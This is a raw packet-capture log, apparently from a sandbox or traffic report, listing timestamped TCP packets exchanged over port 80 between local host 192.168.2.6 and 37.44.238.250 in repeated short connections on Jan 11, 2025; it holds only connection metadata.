                                                                                  Jan 11, 2025 06:44:09.964215040 CET805709837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:09.964231968 CET805709837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:09.964242935 CET805709837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:10.234433889 CET805709837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:10.285823107 CET5709880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:10.407032967 CET805709837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:10.457710981 CET5709880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:10.534847021 CET5709780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:10.535530090 CET5709880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:10.536422968 CET5709980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:10.540725946 CET805709837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:10.540844917 CET5709880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:10.541353941 CET805709937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:10.541431904 CET5709980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:10.541552067 CET5709980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:10.546423912 CET805709937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:10.895277977 CET5709980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:10.900396109 CET805709937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:10.900424004 CET805709937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:10.900437117 CET805709937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:11.175615072 CET805709937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:11.223297119 CET5709980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:11.307257891 CET805709937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:11.363971949 CET5709980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:11.440941095 CET5709980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:11.441685915 CET5710080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:11.446191072 CET805709937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:11.446264982 CET5709980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:11.446655989 CET805710037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:11.446788073 CET5710080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:11.446904898 CET5710080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:11.451740026 CET805710037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:11.801517010 CET5710080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:11.806660891 CET805710037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:11.806680918 CET805710037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:11.806694031 CET805710037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:12.103729963 CET805710037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:12.145149946 CET5710080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:12.240104914 CET805710037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:12.285784006 CET5710080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:12.360717058 CET5710080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:12.361542940 CET5710180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:12.365799904 CET805710037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:12.365875959 CET5710080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:12.366456985 CET805710137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:12.366530895 CET5710180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:12.366627932 CET5710180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:12.371505976 CET805710137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:12.744771004 CET5710180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:12.750488043 CET805710137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:12.750507116 CET805710137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:12.750519991 CET805710137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:13.004443884 CET805710137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:13.051412106 CET5710180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:13.140053034 CET805710137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:13.192040920 CET5710180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:13.255218983 CET5710180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:13.256253958 CET5710280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:13.260330915 CET805710137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:13.260428905 CET5710180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:13.261100054 CET805710237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:13.261190891 CET5710280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:13.261321068 CET5710280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:13.266134977 CET805710237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:13.268937111 CET5710380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:13.273750067 CET805710337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:13.275846004 CET5710380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:13.275933981 CET5710380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:13.280785084 CET805710337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:13.614279032 CET5710280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:13.619339943 CET805710237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:13.619364977 CET805710237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:13.630062103 CET5710380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:13.634917974 CET805710337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:13.634939909 CET805710337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:13.634951115 CET805710337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:13.905131102 CET805710337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:13.909260035 CET805710237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:13.957664967 CET5710380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:13.957667112 CET5710280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:14.034415960 CET805710337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:14.037539959 CET5710280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:14.042099953 CET805710237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:14.042165995 CET5710280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:14.042584896 CET805710237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:14.045548916 CET5710280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:14.082653046 CET5710380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:14.162264109 CET5710380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:14.163171053 CET5710480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:14.167424917 CET805710337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:14.168025970 CET805710437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:14.168102026 CET5710480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:14.168248892 CET5710480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:14.169322968 CET5710380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:14.174261093 CET805710437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:14.520293951 CET5710480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:14.525228024 CET805710437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:14.525243998 CET805710437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:14.525255919 CET805710437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:14.807893038 CET805710437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:14.864327908 CET5710480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:14.940356970 CET805710437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:14.941056967 CET5710480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:14.946114063 CET805710437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:14.946222067 CET5710480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:15.067159891 CET5710580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:15.072146893 CET805710537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:15.072345018 CET5710580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:15.072345018 CET5710580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:15.077307940 CET805710537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:15.426804066 CET5710580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:15.431919098 CET805710537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:15.431961060 CET805710537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:15.431996107 CET805710537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:15.719676971 CET805710537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:15.770205975 CET5710580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:15.850136042 CET805710537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:15.895179033 CET5710580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:15.974958897 CET5710580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:15.976442099 CET5710680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:15.980191946 CET805710537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:15.980273008 CET5710580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:15.981344938 CET805710637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:15.981650114 CET5710680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:15.981650114 CET5710680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:15.986480951 CET805710637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:16.332801104 CET5710680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:16.344212055 CET805710637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:16.344234943 CET805710637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:16.344248056 CET805710637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:16.619368076 CET805710637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:16.660797119 CET5710680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:16.795833111 CET805710637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:16.848311901 CET5710680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:16.925168037 CET5710680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:16.926064968 CET5710780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:16.930248976 CET805710637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:16.930891991 CET805710737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:16.930949926 CET5710680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:16.930984974 CET5710780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:16.931185007 CET5710780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:16.936022997 CET805710737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:17.285975933 CET5710780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:17.292191029 CET805710737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:17.292680979 CET805710737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:17.292692900 CET805710737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:17.569617987 CET805710737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:17.613914967 CET5710780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:17.700572014 CET805710737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:17.754528999 CET5710780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:17.814703941 CET5710780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:17.815447092 CET5710880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:17.819819927 CET805710737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:17.819889069 CET5710780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:17.820290089 CET805710837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:17.820355892 CET5710880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:17.820477009 CET5710880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:17.825217962 CET805710837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:18.177826881 CET5710880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:18.182841063 CET805710837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:18.182862043 CET805710837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:18.182878971 CET805710837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:18.468466043 CET805710837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:18.520199060 CET5710880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:18.606482029 CET805710837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:18.660777092 CET5710880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:18.738456964 CET5710880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:18.739470005 CET5710980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:18.743530035 CET805710837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:18.743603945 CET5710880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:18.744369030 CET805710937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:18.744468927 CET5710980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:18.744658947 CET5710980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:18.749445915 CET805710937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:19.036911964 CET5710980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:19.037544966 CET5711080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:19.043605089 CET805711037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:19.043730974 CET5711080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:19.043881893 CET5711080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:19.048667908 CET805711037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:19.083616972 CET805710937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:19.159863949 CET5711180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:19.164794922 CET805711137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:19.164925098 CET5711180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:19.165081024 CET5711180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:19.169872999 CET805711137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:19.214663029 CET805710937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:19.214754105 CET5710980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:19.395277023 CET5711080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:19.400203943 CET805711037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:19.400243044 CET805711037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:19.520464897 CET5711180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:19.525517941 CET805711137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:19.525564909 CET805711137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:19.525595903 CET805711137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:19.690864086 CET805711037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:19.738924026 CET5711080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:19.797525883 CET805711137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:19.822074890 CET805711037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:19.849562883 CET5711180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:19.863914967 CET5711080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:19.931071997 CET805711137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:19.973355055 CET5711180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:20.049385071 CET5711080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:20.049433947 CET5711180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:20.050229073 CET5711280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:20.054548979 CET805711037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:20.054660082 CET5711080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:20.055017948 CET805711137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:20.055071115 CET805711237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:20.055093050 CET5711180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:20.055294037 CET5711280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:20.055349112 CET5711280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:20.060118914 CET805711237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:20.410913944 CET5711280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:20.415955067 CET805711237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:20.415994883 CET805711237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:20.416028976 CET805711237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:20.693500042 CET805711237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:20.738924980 CET5711280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:20.824189901 CET805711237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:20.865788937 CET5711280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:20.942687988 CET5706180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:20.947994947 CET5711380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:20.952949047 CET805711337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:20.953027010 CET5711380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:20.953166962 CET5711380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:20.958009005 CET805711337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:21.306843042 CET5711380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:21.311826944 CET805711337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:21.311845064 CET805711337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:21.311852932 CET805711337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:21.581645966 CET805711337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:21.629544020 CET5711380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:21.710410118 CET805711337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:21.754673958 CET5711380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:21.832187891 CET5711380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:21.833267927 CET5711480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:21.838012934 CET805711337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:21.838078976 CET5711380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:21.838844061 CET805711437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:21.838913918 CET5711480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:21.839039087 CET5711480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:21.844466925 CET805711437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:22.192125082 CET5711480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:22.197096109 CET805711437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:22.197112083 CET805711437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:22.197124004 CET805711437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:22.496242046 CET805711437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:22.551431894 CET5711480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:22.668924093 CET805711437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:22.723303080 CET5711480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:22.782267094 CET5711480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:22.783195972 CET5711580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:22.787283897 CET805711437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:22.787336111 CET5711480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:22.788008928 CET805711537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:22.788070917 CET5711580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:22.788189888 CET5711580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:22.792959929 CET805711537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:23.145566940 CET5711580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:23.152333021 CET805711537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:23.152350903 CET805711537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:23.152360916 CET805711537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:23.417514086 CET805711537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:23.457684994 CET5711580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:23.550510883 CET805711537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:23.602158070 CET5711580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:23.675350904 CET5711580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:23.678590059 CET5711680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:23.680526018 CET805711537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:23.680615902 CET5711580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:23.683507919 CET805711637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:23.683585882 CET5711680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:23.683778048 CET5711680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:23.690845966 CET805711637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:24.038718939 CET5711680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:24.045886993 CET805711637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:24.045943975 CET805711637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:24.045958042 CET805711637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:24.315583944 CET805711637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:24.363924980 CET5711680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:24.442516088 CET805711637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:24.488944054 CET5711680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:24.560839891 CET5711280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:24.565751076 CET5711680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:24.566426992 CET5711780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:24.570852041 CET805711637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:24.570914030 CET5711680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:24.571228027 CET805711737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:24.571309090 CET5711780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:24.571412086 CET5711780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:24.576212883 CET805711737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:24.833583117 CET5711780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:24.834084034 CET5711880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:24.838979959 CET805711837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:24.839119911 CET5711880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:24.839361906 CET5711880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:24.844118118 CET805711837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:24.879662037 CET805711737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:24.956684113 CET5711980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:24.963675976 CET805711937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:24.963769913 CET5711980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:24.963880062 CET5711980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:24.968588114 CET805711937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:25.034096003 CET805711737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:25.034295082 CET5711780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:25.192234039 CET5711880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:25.197145939 CET805711837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:25.197351933 CET805711837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:25.317275047 CET5711980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:25.322223902 CET805711937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:25.322252989 CET805711937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:25.322282076 CET805711937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:25.487061024 CET805711837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:25.535813093 CET5711880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:25.597065926 CET805711937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:25.618439913 CET805711837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:25.645200968 CET5711980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:25.660804987 CET5711880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:25.764413118 CET805711937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:25.817100048 CET5711980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:25.893062115 CET5711880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:25.893065929 CET5711980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:25.894037008 CET5712080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:25.898185015 CET805711937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:25.898214102 CET805711837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:25.898245096 CET5711980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:25.898277044 CET5711880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:25.898825884 CET805712037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:25.898899078 CET5712080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:25.899003029 CET5712080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:25.903728962 CET805712037.44.238.250192.168.2.6
